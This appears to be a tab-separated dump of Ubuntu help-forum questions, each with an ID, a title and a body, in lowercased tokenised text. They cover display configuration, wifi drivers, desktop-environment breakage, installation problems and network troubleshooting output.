device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection this xorg.conf booted but my 3rd display did not work section `` serverlayout '' identifier `` layout0 '' screen 0 `` displaylinkscreen '' screen 1 `` internal '' rightof `` displaylinkscreen '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` device '' identifier `` displaylinkdevice '' driver `` fbdev '' busid `` usb '' option `` fbdev '' `` /dev/fb0 '' endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' subsection `` display '' depth 24 modes `` 1920x1200 '' `` 1920x1080 '' `` 1680x1050 '' `` 1600x1200 '' `` 1440x900 '' `` 1366x768 '' `` 1280x1024 '' `` 1280x960 '' `` 1280x800 '' `` 1280x768 '' `` 1152x864 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection endsection lsusb returns : bus 002 device 002 : id 17e9:0360 displaylink bus 002 device 004 : id 04f2 : b071 chicony electronics co. , ltd 2.0m uvc webcam / cnf7129 bus 007 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub dmesg returns : usb 2-3 : new high-speed usb device number 2 using ehci-pci [ 1.375923 ] usb 2-3 : new usb device found , idvendor=17e9 , idproduct=0360 [ 1.375986 ] usb 2-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1.376054 ] usb 2-3 : product : sabrent usb-2011 [ 1.376112 ] usb 2-3 : manufacturer : displaylink [ 1.376169 ] usb 2-3 : serialnumber : 660271 [ 1.488014 ] tsc : refined tsc clocksource calibration : 2526.999 mhz [ 1.488078 ] switching to clocksource tsc [ 1.628012 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 1.667462 ] ata1.00 : ata-8 : st9500325as , 0002sdm1 , max udma/133 [ 1.667522 ] ata1.00 : 976773168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) [ 1.669738 ] ata1.00 : configured for udma/133 [ 1.669905 ] scsi 0:0:0:0 : direct-access ata st9500325as 0002 pq
358975	ubuntu 13:04 - clicking `` search your computer and online resource '' icon causes a blank screen to appear and i am unable to get the taskbar back	i have recently installed the ubuntu 13.04 distribution and until today it has been running successfully . i get an issue when i try to click on the `` search your computer and online resource '' icon where the screen goes entirely blank and the only window that i am able to open is `` change desktop background '' - which appears without a frame so i am unable to minimise or remove it . clicking ctrl-alt-t successfully launches a terminal but i am unable to select it as there are no frames on any of the windows that launch after this problem appears . i am able to run the pc successfully if i avoid clicking on the search icon as all of the other programs that are launched from the taskbar are fine !
358977	codeblocks causing some problems	i have installed codeblocks in my ubuntu and everything is fine but when i am going to run it , it casues problem , eg if i save my code in a different directory like e : \ , when i try to run it , it shows , permission denied but if save my code in the desktop it runs all awesome.. i do n't get where the problem is , so could you please explain me . thanks in advance .
358978	installation hangs after `` copying files completed ''	i was trying to install ubuntu 12.04 from live cd along with windows xp . it worked fine till `` where are you '' screen .files copying has been completed successfully.but after that when i clicked continue button it hangs
358980	ubuntu with window manager for longest battery life	i have used linux mint mate for a year now and want to try out ubuntu . i have a hp touchsmart notebook , 1.3 ghz dual core 4 gb ram but since switching to linux mint from win7 battery life was never as good as in win 7 , although i tried different things ( eg disabling one of my two graphic cards , etc ) now i 'd like to test some other ubuntu ( derivates ) . should i even try ubuntu out , if my goal is long battery life ? can i just install in ubuntu something like fluxbox to make it more efficient ? or should i directly go to lubuntu or something like that . kind regards
358982	asterisk how to implement	now it 's time for me to start going to jump into the purpose i studied linux . i like to build my own asterisk pbx . if you have experience with asterisk , please read forward . i have one pri handed out to us as rj45 plug , has 23 channels , have 40 desks where calls will be distributed . is it possible to plug use this pri and sip to user desks ? so , phone carrier -- -- - ( pri ) -- -- -- -- -asterisk -- -- ( sip ) -- -- -- -- users ultimately , i do n't know if this layout works , do n't know if asterisk takes any digital phones to use . phone carrier -- -- - ( pri ) -- -- -asterisk -- -- -- users ( toshiba digital phones or any compatible digital phones ) what kind of parts do i need and can you give me some road map to start ?
358983	how can a function/script tell xterm from terminology ?	i want to have a function in .bash_login that displays text if the current terminal is xterm , but not terminology . when i do echo $ term in terminology , it outputs xterm how can i tell them apart ?
358988	problems with ubuntu after installing cinnamon , unity broken	i installed the newest version of cinnamon on my ubuntu 13.04 only to see how good it looks , hoping that i would still be able to use unity if i did n't like it . it turns out it was a bad idea because cinnamon broke not only unity ( to the point of complete uselessness ) but also crucial system functions like the software center and bug reporting . i tried to reinstall unity using terminal ( i found a tutorial but i ca n't recall exactly what commands were there , 'reinstall ubuntu-desktop ' or something like that ) and purge cinnamon ( with another tutorial ) and now unity runs pretty much ok , but software center does n't open and bug reporting causes a big crash ( restart needed ) . furthermore i ca n't access the 'appearance ' option , it just does n't start . is there way of restoring things as they were before cinnamon ? or i messed to much and have to reinstall ubuntu ?
358989	install gnome 3.10 in ubuntu 13.10 without breaking unity	i just installed the ubuntu 13.10 rc . everything works fine so far . the thing is i want to also install gnome 3.10 and i worry that this will break unity . i know how to install the latest gnome release : sudo add-apt-repository ppa : gnome3-team/gnome3-next sudo add-apt-repository ppa : gnome3-team/gnome3-staging sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install gnome-shell gnome-shell-extensions my question is if i should do anything else to ensure that i can have both environments without something breaking ? edit i followed the orders here so after the above steps i also did : switched to gdm sudo apt-get install gdm and select gdm instead of lightdm when prompted . removed the ubuntu overlay scrollbars : sudo apt-get remove overlay-scrollbar
358990	auto-login sometimes fails [ solved ]	running ubuntu 12.04 , 64-bit , 3.8.0-31-generic occasionally , perhaps 33 % , on bootup , i get my mdm manual login screen and need to enter username/password , even though i 've configured mdmsetup for auto-login . anyone have any idea what 's going on here ?
358993	looking for good hardware choices for ubuntu studio	i 'd like to build a machine that would run well with ardour or any linux software , but having a difficult time knowing where to look . can anyone point me in the direction of a place that compares linux compatible audio hardware , or at least let me know of some good possibilities ? thanks .
358996	how can i edit the nautilus quicklist in ubuntu 13.10 ?	in ubuntu 13.10 how can i edit the quicklist ? because i need to add some other place and remove some that are default ( like picture , video , etc ) thanks !
358997	installing 13.04 on a win 8 pc	can i install ubuntu 13.04 on a windows 8 hp computer with the uefi ? if so are there any special things i must do to insure the uefi does n't block the installation .
358999	openstack php cloud manager	i have node with clean ubuntu 12.04.3 and openstack installed on it . everything works fine and now i want to make it commercial and sell cloud servers . is there any php script to easy create cloud servers and some user-mode control panel ?
359000	13.04 wont start , `` cant identify screen , graphics card etc ... '' error	trying to start 13.04 after a recent installation . a window appears that says `` can not correctly detect the screen , graphics card , and input device settings '' you will need to set these yourself . standby as display restarts '' then there is only a terminal window , which says `` * checking battery state ... [ ok ] '' and it just hangs there and does nothing and does not respond to any input '' any suggestions ? thanks , stephen
359001	how can i create keybindings to launch programs from a text console ( with no window-manager / x display ) ?	what is a simple way ( possibly requiring root access ) to set-up hotkeys that i can press when using a console screen in order to run scripts or executable files ? `` console screen '' means not using gnome , kde , etc . -- rather , using just a standard linux text console screen which can usually be accessed with a key-combination like ctrl-alt-f1 .
359003	how to install ubuntu with usb drive ?	i have windows 7 . i downloaded ubuntu but do n't know how to boot through usb drive . there is no startup disk creator in windows 7 . please give a suitable solution
359004	netgear wna1000m on hp 8dv8t-1200 with ubuntu 13.04 ?	ok so i have read lots of post and still have n't gotten this working . i have built-in wireless on my laptop that has been flakey so i tried using a netgear wna1000m . i have been having issues with that as well prompt for passwords and turning on an off . so i am on a quest to make sure the both are setup with the right drivers . i have seen a lot of rtl8192cu for the netgear id 0846:9040 but i noticed that my was 9041 and that it uses rtl8188cus . so my question is is there driver issues that conflicting or what ? i have included as much info as possible . if you need more please let me know lspci -nnk | grep -ia2 net 02:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6200 [ 8086:4239 ] ( rev 35 ) subsystem : intel corporation centrino advanced-n 6200 2x2 agn [ 8086:1311 ] kernel driver in use : iwlwifi 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : hewlett-packard company device [ 103c:7001 ] kernel driver in use : r8169 lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 046d : c063 logitech , inc. dell laser mouse bus 002 device 021 : id 0846:9041 netgear , inc. wna1000m 802.11bgn [ realtek rtl8188cus ] bus 002 device 022 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 002 device 005 : id 138a:0005 validity sensors , inc. vfs301 fingerprint reader bus 002 device 006 : id 0408:03ba quanta computer , inc . bus 002 device 023 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 002 device 024 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) bus 002 device 025 : id 0a5c:2148 broadcom corp. bcm92046dg-cl1rom bluetooth 2.1 adapter ifconfig eth0 link encap : ethernet hwaddr 64:31:50:5d:21 : d7 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:13090 errors:0 dropped:0 overruns:0 frame:0 tx packets:13090 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1079684 ( 1.0 mb ) tx bytes:1079684 ( 1.0 mb ) wlan0 link encap : ethernet hwaddr 00:27:10:9e:38 : ec up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan1 link encap : ethernet hwaddr 10:0d:7f : b4:02:26 inet addr:192.168.2.139 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :120d:7fff : feb4:226/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13987 errors:0 dropped:0 overruns:0 frame:0 tx packets:8134 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:11876294 ( 11.8 mb ) tx bytes:1042900 ( 1.0 mb ) iwconfig wlan1 ieee 802.11bgn essid : '' miwifi '' mode : managed frequency:2.447 ghz access point : 00:04:96:57 : ed:52 bit rate=65 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=59/70 signal level=-51 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:2 missed beacon:0 eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off
359005	how do i use the `` did you mean '' feature in ubuntu ?	if i mistype a command in ubuntu shell , it offers a suggestion . often , the suggestion is right , and i wish to use it . but there is no way except to repeat the last command and make the changes yourself . why does n't it offer a yes/no type suggestion , where you can simply type y to accept the suggestion ? any suggestions to enable such a behaviour ? here 's what happens : sumeet @ sumeet : /media/tux $ git stastus git : 'stastus ' is not a git command . see 'git -- help ' . did you mean this ? status sumeet @ sumeet : /media/tux $
359006	will mir properly run with intel video cards ?	according to this , intel has dropped support for mir . what is the effect on end user ?
359010	how to activate touchpad in portege r200	ubuntu 12.04 working fine except that i can not use the touchpad . luckily the mouse works . i activate it in the touchpad/mouse app , but no way . thanks
359011	which display server will ubuntu 13.10 ship ?	which display server will ubuntu 13.10 ship ? mir , xmir or x ?
359015	wifi not getting detected in my hp pavilion 15-n011tu having ubuntu 12.04	i brought a new hp pavilion laptop with ubuntu 12.04 in it . however the problem is , that is not detecting any wireless connections . wired connection on the other hand works fine . i tried many things but could n't make it to work . the result to sudo lspci -nn | grep network 08:00.0 network controller [ 0280 ] : mediatek corp. device [ 14c3:7630 ] kindly help . thanks in advance .
359016	explanations for a complete noob	ok , so i 'm thinking of switching to ubuntu for all but gaming and cad ( i 'm an engineering student ) . i 've never tried any form of linux ( unless android counts ) , so i do n't know the first thing about it . my main question is : how user-/idiot-friendly is it ? do i need to be adept at programming to use ubuntu ? i 've heard the joke that linux is the ikea of os 's , but i 've only done very basic matlab and python . so any advanced ( or even basic ) command line use will probably be beyond me . any advice/tips ?
359023	unable to use skype on wine	while logging in skype using wine it gives system error code 1814 ; resource name not found
359032	unable to locate package linux-kernel-devel	i am pretty sure there are three other links that report the same problem , i am getting i am following this link to compile my custom kernel https : //help.ubuntu.com/community/kernel/compile/ tools you 'll need to start , you will need to install a few packages . the exact commands to install those packages depends on which release you are using : hardy ( 8.04 ) : sudo apt-get install linux-kernel-devel fakeroot kernel-wedge build-essential when i try the above packages the fakroot , kernel-wedge , build-essentail all seem to be accesible by terminal except for the linux-kernel-devel . $ sudo apt-get install linux-kernel-devel reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-kernel-devel i am trying to install hardy to my ubuntu 12.04.3 lts , so far i tried sudo apt-get update & & sudo apt-get install linux-kernel-devel i even tried to modify the sourcelist and added the universe line to the line below . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted what is that i am missing here ? why is ubuntu not able to locate the package ? i am wired and connected to the internet .
359033	why does edge resistance always turn back on in compizconfig settings manager ?	running ubuntu 13.04 . i 'm trying to turn off edge resistance for multiple monitors , and it keeps turning itself back on ! it seems to be triggered by mouse movement , and sometimes takes a second or two to re-activate itself . i 've made a recording of it here : https : //mediacru.sh/kfaednvyj0ch any ideas why it 's doing this and how to turn of edge resistance permanently ?
359036	what is hogging my connection ?	at times it seems like dozens , if not hundreds of root-owned http connections spring up . this is not much of a problem on lan or wlan as each of them seems to transfer very little , but if i use gprs link , my ping times go into minutes ( seriously , 80000ms is not infrequent ! ) and all connections grind to a halt waiting till these end . this usually lasts some 15 minutes and ends about when i start troubleshooting it for real . i 've managed to capture a fragment of nethogs output nethogs version 0.8.0 pid user program dev sent received ? root 37.209.147.180:59854-141.101.114.59:80 0.013 0.000 kb/sec ? root 37.209.147.180:59853-141.101.114.59:80 0.000 0.000 kb/sec ? root 37.209.147.180:52804-173.194.70.95:80 0.000 0.000 kb/sec 1954 bw /home/bw/.dropbox-dist/dropbox ppp0 0.000 0.000 kb/sec ? root 37.209.147.180:59851-141.101.114.59:80 0.000 0.000 kb/sec ? root 37.209.147.180:59850-141.101.114.59:80 0.000 0.000 kb/sec ? root 37.209.147.180:52801-173.194.70.95:80 0.000 0.000 kb/sec 13301 bw /usr/lib/firefox/firefox ppp0 0.000 0.000 kb/sec ? root unknown tcp 0.000 0.000 kb/sec unfortunately , it does n't display the owning process of these . does anyone recognize these addresses or is able to suggest how to troubleshoot it further or disable it ? is it some automatic update or something like that ? edit : per request ; netstat -n , for obvious reason that normal netstat wo n't ever launch as all dns requests are hogged just the same . netstat -n active internet connections ( w/o servers ) proto recv-q send-q local address foreign address state tcp 0 1 93.154.166.62:51314 198.252.206.16:80 fin_wait1 tcp 0 1 37.209.147.180:44098 198.252.206.16:80 fin_wait1 tcp 0 1 37.209.147.180:59855 141.101.114.59:80 fin_wait1 tcp 1 0 192.168.43.224:38237 213.189.45.39:443 close_wait tcp 1 0 93.154.146.186:35167 75.101.152.29:80 close_wait tcp 1 0 192.168.43.224:32939 199.15.160.100:80 close_wait tcp 1 0 192.168.43.224:55619 63.245.217.207:443 close_wait tcp 1 0 93.154.146.186:60210 75.101.152.29:443 close_wait tcp 1 0 192.168.43.224:32944 199.15.160.100:80 close_wait tcp 0 1 37.209.147.180:52804 173.194.70.95:80 fin_wait1 tcp 1 0 93.154.146.186:46606 23.21.151.181:80 close_wait tcp 1 0 93.154.146.186:52619 107.22.246.76:80 close_wait tcp 415 0 93.154.146.186:36156 82.112.106.104:80 close_wait tcp 1 0 93.154.146.186:50352 107.22.246.76:443 close_wait tcp 1 0 192.168.43.224:55000 213.189.45.44:443 close_wait tcp 0 1 37.209.147.180:59853 141.101.114.59:80 fin_wait1 tcp 1 0 192.168.43.224:32937 199.15.160.100:80 close_wait tcp 1 0 192.168.43.224:56055 93.184.221.40:80 close_wait tcp 415 0 93.154.146.186:36155 82.112.106.104:80 close_wait tcp 0 1 37.209.147.180:44097 198.252.206.16:80 fin_wait1 tcp 1 0 93.154.146.186:35166 75.101.152.29:80 close_wait tcp 1 0 192.168.43.224:32943 199.15.160.100:80 close_wait tcp 1 0 93.154.146.186:46607 23.21.151.181:80 close_wait tcp 1 0 93.154.146.186:36422 23.21.151.181:443 close_wait tcp 1 0 192.168.43.224:36081 93.184.220.148:80 close_wait tcp 1 0 192.168.43.224:44462 213.189.45.29:443 close_wait tcp 1 0 192.168.43.224:32938 199.15.160.100:80 close_wait tcp 1 0 93.154.146.186:36419 23.21.151.181:443 close_wait tcp 0 497 93.154.166.62:51313 198.252.206.16:80 fin_wait1 tcp 0 1 37.209.147.180:59851 141.101.114.59:80 fin_wait1 tcp 0 1 37.209.147.180:44095 198.252.206.16:80 fin_wait1 tcp 1 0 93.154.146.186:46611 23.21.151.181:80 close_wait tcp 1 0 192.168.43.224:38236 213.189.45.39:443 close_wait tcp 0 171 37.209.147.180:45341 173.194.113.146:443 established tcp 0 1 37.209.147.180:52801 173.194.70.95:80 fin_wait1 tcp 1 0 192.168.43.224:36080 93.184.220.148:80 close_wait tcp 0 1 37.209.147.180:59856 141.101.114.59:80 fin_wait1 tcp 0 1 37.209.147.180:44096 198.252.206.16:80 fin_wait1 tcp 0 1 93.154.166.62:57471 108.160.162.49:80 fin_wait1 tcp 0 1 37.209.147.180:59854 141.101.114.59:80 fin_wait1 tcp 0 171 37.209.147.180:45340 173.194.113.146:443 established tcp 0 168 37.209.147.180:45334 173.194.113.146:443 fin_wait1 tcp 1 0 93.154.146.186:46609 23.21.151.181:80 close_wait tcp 0 1248 93.154.166.62:58270 64.251.23.59:443 fin_wait1 tcp 0 1 37.209.147.180:59850 141.101.114.59:80 fin_wait1 tcp 1 0 93.154.146.186:35181 75.101.152.29:80 close_wait tcp 232 0 93.154.172.168:46384 198.252.206.25:80 established tcp 1 0 93.154.146.186:52618 107.22.246.76:80 close_wait tcp 1 0 93.154.172.168:36298 173.194.69.95:443 close_wait tcp 1 0 93.154.146.186:60209 75.101.152.29:443 close_wait tcp 0 168 37.209.147.180:45335 173.194.113.146:443 fin_wait1 tcp 415 0 93.154.146.186:36157 82.112.106.104:80 close_wait tcp 1 0 192.168.43.224:36082 93.184.220.148:80 close_wait tcp 1 0 192.168.43.224:32942 199.15.160.100:80 close_wait tcp 1 0 93.154.146.186:50350 107.22.246.76:443 close_wait tcp 1 0 192.168.43.224:32941 199.15.160.100:80 close_wait tcp 0 534 37.209.147.180:44089 198.252.206.16:80 fin_wait1 tcp 1 0 93.154.146.186:46608 23.21.151.181:80 close_wait tcp 1 0 93.154.146.186:46612 23.21.151.181:80 close_wait udp 0 0 37.209.147.180:49057 193.41.112.14:53 established udp 0 0 37.209.147.180:51631 193.41.112.18:53 established udp 0 0 37.209.147.180:34827 193.41.112.18:53 established udp 0 0 37.209.147.180:35908 193.41.112.14:53 established udp 0 0 37.209.147.180:44106 193.41.112.14:53 established udp 0 0 37.209.147.180:42184 193.41.112.14:53 established udp 0 0 37.209.147.180:54485 193.41.112.14:53 established udp 0 0 37.209.147.180:42216 193.41.112.18:53 established udp 0 0 37.209.147.180:51961 193.41.112.14:53 established udp 0 0 37.209.147.180:48412 193.41.112.14:53 established the interesting lines from ping got lost , but the summary over past few hours is : -- - 8.8.8.8 ping statistics -- - 107459 packets transmitted , 104376 received , +22 duplicates , 2 % packet loss , time 195427362ms rtt min/avg/max/mdev = 24.822/528.132/90538.257/2519.263 ms , pipe 90 edit : per request : happened again , reboot did n't help but cleaned up all `` hanging '' processes . currently netstat shows : bw @ pony : /var/log $ netstat -n -t active internet connections ( w/o servers ) proto recv-q send-q local address foreign address state tcp 0 0 93.154.188.68:42767 74.125.239.143:443 time_wait tcp 0 0 93.154.188.68:50270 173.194.69.189:443 established tcp 0 0 93.154.188.68:45250 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:53488 173.194.32.198:80 established tcp 0 0 93.154.188.68:53490 173.194.32.198:80 established tcp 0 159 93.154.188.68:42741 74.125.239.143:443 last_ack tcp 0 0 93.154.188.68:45808 198.252.206.25:80 established tcp 0 0 93.154.188.68:52449 173.194.32.199:443 established tcp 0 0 93.154.188.68:52600 173.194.32.199:443 time_wait tcp 0 0 93.154.188.68:50300 173.194.69.189:443 time_wait tcp 0 0 93.154.188.68:45253 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:46252 173.194.32.204:443 established tcp 0 0 93.154.188.68:45246 190.93.244.58:80 established tcp 0 0 93.154.188.68:47064 173.194.113.143:443 established tcp 0 0 93.154.188.68:34484 173.194.69.95:443 established tcp 0 0 93.154.188.68:45252 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:54290 173.194.32.202:443 established tcp 0 0 93.154.188.68:47063 173.194.113.143:443 established tcp 0 0 93.154.188.68:53469 173.194.32.198:80 time_wait tcp 0 0 93.154.188.68:45242 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:53468 173.194.32.198:80 established tcp 0 0 93.154.188.68:50299 173.194.69.189:443 time_wait tcp 0 0 93.154.188.68:42764 74.125.239.143:443 time_wait tcp 0 0 93.154.188.68:45256 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:58047 108.160.162.105:80 established tcp 0 0 93.154.188.68:45249 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:50297 173.194.69.189:443 time_wait tcp 0 0 93.154.188.68:53470 173.194.32.198:80 established tcp 0 0 93.154.188.68:34100 68.232.35.121:443 established tcp 0 0 93.154.188.68:42758 74.125.239.143:443 established tcp 0 0 93.154.188.68:42765 74.125.239.143:443 time_wait tcp 0 0 93.154.188.68:39000 173.194.69.95:80 time_wait tcp 0 0 93.154.188.68:50296 173.194.69.189:443 time_wait tcp 0 0 93.154.188.68:53467 173.194.32.198:80 established tcp 0 0 93.154.188.68:42766 74.125.239.143:443 time_wait tcp 0 0 93.154.188.68:45251 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:45248 190.93.244.58:80 time_wait tcp 0 0 93.154.188.68:45247 190.93.244.58:80 established tcp 0 159 93.154.188.68:50254 173.194.69.189:443 last_ack tcp 0 0 93.154.188.68:34483 173.194.69.95:443 established output of ps : user pid % cpu % mem vsz rss tty stat start time command root 1 0.8 0.0 3628 2092 ? ss 16:52 0:03 /sbin/init root 2 0.0 0.0 0 0 ? s 16:52 0:00 [ kthreadd ] root 3 0.1 0.0 0 0 ? s 16:52 0:00 [ ksoftirqd/0 ] root 4 0.1 0.0 0 0 ? s 16:52 0:00 [ kworker/0:0 ] root 6 0.0 0.0 0 0 ? s 16:52 0:00 [ migration/0 ] root 7 0.0 0.0 0 0 ? s 16:52 0:00 [ watchdog/0 ] root 8 0.0 0.0 0 0 ? s 16:52 0:00 [ migration/1 ] root 10 0.1 0.0 0 0 ? s 16:52 0:00 [ ksoftirqd/1 ] root 11 0.0 0.0 0 0 ? s 16:52 0:00 [ watchdog/1 ] root 12 0.0 0.0 0 0 ? s 16:52 0:00 [ migration/2 ] root 14 0.1 0.0 0 0 ? s 16:52 0:00 [ ksoftirqd/2 ] root 15 0.0 0.0 0 0 ? s 16:52 0:00 [ watchdog/2 ] root 16 0.0 0.0 0 0 ? s 16:52 0:00 [ migration/3 ] root 17 0.0 0.0 0 0 ? s 16:52 0:00 [ kworker/3:0 ] root 18 0.1 0.0 0 0 ? s 16:52 0:00 [ ksoftirqd/3 ] root 19 0.0 0.0 0 0 ? s 16:52 0:00 [ watchdog/3 ] root 20 0.0 0.0 0 0 ? s < 16:52 0:00 [ cpuset ] root 21 0.0 0.0 0 0 ? s < 16:52 0:00 [ khelper ] root 22 0.0 0.0 0 0 ? s 16:52 0:00 [ kdevtmpfs ] root 23 0.0 0.0 0 0 ? s < 16:52 0:00 [ netns ] root 24 0.0 0.0 0 0 ? s 16:52 0:00 [ sync_supers ] root 25 0.0 0.0 0 0 ? s 16:52 0:00 [ bdi-default ] root 26 0.0 0.0 0 0 ? s < 16:52 0:00 [ kintegrityd ] root 27 0.0 0.0 0 0 ? s < 16:52 0:00 [ kblockd ] root 28 0.0 0.0 0 0 ? s < 16:52 0:00 [ ata_sff ] root 29 0.0 0.0 0 0 ? s 16:52 0:00 [ khubd ] root 30 0.0 0.0 0 0 ? s < 16:52 0:00 [ md ] root 42 0.0 0.0 0 0 ? s 16:52 0:00 [ khungtaskd ] root 43 0.0 0.0 0 0 ? s 16:52 0:00 [ kswapd0 ] root 44 0.0 0.0 0 0 ? sn 16:52 0:00 [ ksmd ] root 45 0.0 0.0 0 0 ? sn 16:52 0:00 [ khugepaged ] root 46 0.0 0.0 0 0 ? s 16:52 0:00 [ fsnotify_mark ] root 47 0.0 0.0 0 0 ? s 16:52 0:00 [ ecryptfs-kthrea ] root 48 0.0 0.0 0 0 ? s < 16:52 0:00 [ crypto ] root 59 0.0 0.0 0 0 ? s < 16:52 0:00 [ kthrotld ] root 70 0.1 0.0 0 0 ? s 16:52 0:00 [ kworker/2:1 ] root 71 0.0 0.0 0 0 ? s 16:52 0:00 [ scsi_eh_0 ] root 72 0.0 0.0 0 0 ? s 16:52 0:00 [ scsi_eh_1 ] root 73 0.0 0.0 0 0 ? s 16:52 0:00 [ scsi_eh_2 ] root 74 0.0 0.0 0 0 ? s 16:52 0:00 [ scsi_eh_3 ] root 75 0.0 0.0 0 0 ? s 16:52 0:00 [ kworker/u:2 ] root 76 0.0 0.0 0 0 ? s 16:52 0:00 [ kworker/u:3 ] root 79 0.0 0.0 0 0 ? s 16:52 0:00 [ kworker/1:1 ] root 99 0.0 0.0 0 0 ? s < 16:52 0:00 [ deferwq ] root 100 0.0 0.0 0 0 ? s < 16:52 0:00 [ charger_manager ] root 101 0.0 0.0 0 0 ? s < 16:52 0:00 [ devfreq_wq ] root 102 0.1 0.0 0 0 ? s 16:52 0:00 [ kworker/2:2 ] root 106 0.0 0.0 0 0 ? s 16:52 0:00 [ scsi_eh_4 ] root 107 0.0 0.0 0 0 ? s 16:52 0:00 [ usb-storage ] root 108 0.0 0.0 0 0 ? s 16:52 0:00 [ scsi_eh_5 ] root 109 0.0 0.0 0 0 ? s 16:52 0:00 [ usb-storage ] root 271 0.1 0.0 0 0 ? s 16:52 0:00 [ kworker/1:2 ] root 316 0.0 0.0 0 0 ? s 16:52 0:00 [ jbd2/sda1-8 ] root 317 0.0 0.0 0 0 ? s < 16:52 0:00 [ ext4-dio-unwrit ] root 440 0.1 0.0 2820 608 ? s 16:52 0:00 upstart-udev-bridge -- daemon root 478 0.0 0.0 3460 1648 ? ss 16:52 0:00 /sbin/udevd -- daemon root 632 0.0 0.0 3348 1336 ? s 16:52 0:00 /sbin/udevd -- daemon root 633 0.0 0.0 3348 1204 ? s 16:52 0:00 /sbin/udevd -- daemon root 782 0.0 0.0 2816 596 ? s 16:52 0:00 upstart-socket-bridge -- daemon root 822 0.0 0.0 6684 2400 ? ss 16:52 0:00 /usr/sbin/sshd -d 102 834 0.2 0.0 4064 1864 ? ss 16:52 0:01 dbus-daemon -- system -- fork root 857 0.0 0.1 7420 3380 ? ss 16:52 0:00 /usr/sbin/modem-manager root 858 0.0 0.0 4784 1636 ? ss 16:52 0:00 /usr/sbin/bluetoothd syslog 860 0.0 0.0 31068 1496 ? sl 16:52 0:00 rsyslogd -c5 root 869 0.1 0.1 24280 5564 ? ssl 16:52 0:00 networkmanager avahi 883 0.0 0.0 3448 1488 ? s 16:52 0:00 avahi-daemon : running [ pony.local ] avahi 884 0.0 0.0 3448 436 ? s 16:52 0:00 avahi-daemon : chroot helper root 885 0.0 0.0 0 0 ? s < 16:52 0:00 [ kpsmoused ] root 892 0.0 0.1 25696 4140 ? sl 16:52 0:00 /usr/lib/policykit-1/polkitd -- no-debug root 923 0.0 0.0 0 0 ? s 16:52 0:00 [ scsi_eh_6 ] root 959 0.0 0.0 0 0 ? s < 16:52 0:00 [ krfcommd ] root 970 0.0 0.1 7536 